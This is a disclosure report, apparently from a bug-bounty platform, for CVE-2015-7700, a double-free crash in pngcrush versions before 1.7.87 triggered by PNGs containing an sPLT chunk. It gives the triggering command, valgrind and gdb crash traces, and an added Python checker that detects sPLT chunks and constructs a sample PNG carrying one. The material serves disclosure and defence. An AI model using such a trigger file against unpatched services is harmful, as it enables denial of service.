pngcrush double-free/segfault could result in DoS (CVE-2015-7700)

Disclosed: 2019-10-04 16:02:41 By geeknik To ibb
Unknown
Vulnerability Details
All versions of pngcrush (pmt.sourceforge.net/pngcrush) prior to version 1.7.87 have a double-free segfault that can be triggered by reading a valid PNG file that contains the sPLT chunk. This bug has been fixed in 1.7.87 by the project maintainer. Persuading someone to run pngcrush with a valid PNG file that contains the sPLT chunk, or submitting such a PNG file remotely to a web-based service that accepts PNG files and processes them with pngcrush, will cause the application to segfault. This can at a minimum cause denial-of-service.

./pngcrush -reduce -brute ps1n0g08.png /dev/null

==56277== Invalid read of size 8
==56277==    at 0x44989E: png_free_data (png.c:542)
==56277==    by 0x412D99: main (pngcrush.c:6061)
==56277==  Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc'd
==56277==    at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277==    by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277==    by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277==    by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277==    by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277==    by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277==    by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277==    by 0x47BE1D: png_read_info (pngread.c:222)
==56277==    by 0x40BA8E: main (pngcrush.c:5082)
Pointer 0x5555555555555555 not found
==56277== Invalid free() / delete / delete[] / realloc()
==56277==    at 0x4C27C59: free (vg_replace_malloc.c:476)
==56277==    by 0x4498A6: png_free_data (png.c:542)
==56277==    by 0x412D99: main (pngcrush.c:6061)
==56277==  Address 0x5555555555555555 is not stack'd, malloc'd or (recently) free'd
==56277==
==56277== Invalid read of size 8
==56277==    at 0x4498B1: png_free_data (png.c:543)
==56277==    by 0x412D99: main (pngcrush.c:6061)
==56277==  Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc'd
==56277==    at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277==    by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277==    by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277==    by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277==    by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277==    by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277==    by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277==    by 0x47BE1D: png_read_info (pngread.c:222)
==56277==    by 0x40BA8E: main (pngcrush.c:5082)
==56277==
==56277== Invalid write of size 8
==56277==    at 0x4498C8: png_free_data (png.c:544)
==56277==    by 0x412D99: main (pngcrush.c:6061)
==56277==  Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc'd
==56277==    at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277==    by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277==    by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277==    by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277==    by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277==    by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277==    by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277==    by 0x47BE1D: png_read_info (pngread.c:222)
==56277==    by 0x40BA8E: main (pngcrush.c:5082)
==56277==
==56277== Invalid write of size 8
==56277==    at 0x4498D0: png_free_data (png.c:545)
==56277==    by 0x412D99: main (pngcrush.c:6061)
==56277==  Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc'd
==56277==    at 0x4C26B3F: malloc (vg_replace_malloc.c:299)
==56277==    by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294)
==56277==    by 0x478E9E: png_malloc_base (pngmem.c:91)
==56277==    by 0x478E9E: png_malloc_array_checked (pngmem.c:115)
==56277==    by 0x478E9E: png_realloc_array (pngmem.c:145)
==56277==    by 0x4E2A7F: png_set_sPLT (pngset.c:1013)
==56277==    by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746)
==56277==    by 0x47BE1D: png_read_info (pngread.c:222)
==56277==    by 0x40BA8E: main (pngcrush.c:5082)

Best pngcrush method = 105 (ws 11 fm 4 zl 8 zs 0) = 110 for output to /dev/null
   (9.84% critical chunk reduction)
   (100.00% filesize reduction)
CPU time decoding 0.610, encoding 1.930, other 0.780, total 3.320 sec.

Pointer 0x5555555555555555 not found

Program received signal SIGSEGV, Segmentation fault.
*__GI___libc_free (mem=0x5555555555555555) at malloc.c:3709
3709    malloc.c: No such file or directory.
(gdb) bt
#0  *__GI___libc_free (mem=0x5555555555555555) at malloc.c:3709
#1  0x00000000004498a7 in png_free_data () at png.c:542
#2  0x0000000000412d9a in main () at pngcrush.c:6061
(gdb) i r
rax            0x0                 0
rbx            0x7864d0            7890128
rcx            0x7ffff789f9d0      140737346402768
rdx            0x7ffff7b56e00      140737349250560
rsi            0x25                37
rdi            0x5555555555555555  6148914691236517205
rbp            0x786750            0x786750
rsp            0x7fffffffcfd0      0x7fffffffcfd0
r8             0x7ffff7fde700      140737354000128
r9             0x1                 1
r10            0x0                 0
r11            0x246               582
r12            0x20                32
r13            0x20                32
r14            0x1                 1
r15            0x100               256
rip            0x7ffff784a939      0x7ffff784a939 <*__GI___libc_free+25>
eflags         0x10206             [ PF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
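The trigger is a well-formed PNG whose chunk list includes sPLT, so a service that feeds uploads to pngcrush can pre-screen files for that chunk until it is on 1.7.87 or later. The following chunk walker is an added example, not code from the report or from pngcrush; it validates the PNG signature and every chunk CRC, lists the chunk types, and reports whether an sPLT chunk is present, using a small constructed 1x1 greyscale PNG as sample input.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: 4-byte length, 4-byte type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def iter_chunks(png: bytes):
    """Yield (type, data) for every chunk, rejecting bad signature, truncation or CRC."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos < len(png):
        if pos + 8 > len(png):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        body = png[pos + 8:pos + 8 + length]
        crc_bytes = png[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            raise ValueError(f"truncated {ctype!r} chunk")
        if struct.unpack(">I", crc_bytes)[0] != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":      # nothing after IEND is part of the image
            return

def chunk_types(png: bytes) -> list:
    return [ctype.decode("ascii") for ctype, _ in iter_chunks(png)]

def has_splt(png: bytes) -> bool:
    """True if the file carries an sPLT chunk, the input pngcrush < 1.7.87 mishandles."""
    return any(ctype == b"sPLT" for ctype, _ in iter_chunks(png))

# Constructed sample data (not from the report): a 1x1 8-bit greyscale PNG.
# sPLT body: palette name (NUL-terminated), sample depth, then entries of
# R,G,B,A (1 byte each at depth 8) plus a 2-byte frequency.
SPLT_DATA = b"demo\x00" + b"\x08" + b"\x00\x00\x00\xff\x00\x01"
IHDR_DATA = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # width, height, depth, grey
IDAT_DATA = zlib.compress(b"\x00\x00")                      # filter byte + one pixel
SAMPLE_PNG = (PNG_SIGNATURE + make_chunk(b"IHDR", IHDR_DATA)
              + make_chunk(b"sPLT", SPLT_DATA)
              + make_chunk(b"IDAT", IDAT_DATA) + make_chunk(b"IEND", b""))
SAMPLE_PLAIN = SAMPLE_PNG.replace(make_chunk(b"sPLT", SPLT_DATA), b"")

if __name__ == "__main__":
    print(chunk_types(SAMPLE_PNG), "sPLT present:", has_splt(SAMPLE_PNG))
```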
Report Stats
  • Report ID: 93546
  • State: Closed
  • Substate: resolved
  • Upvotes: 4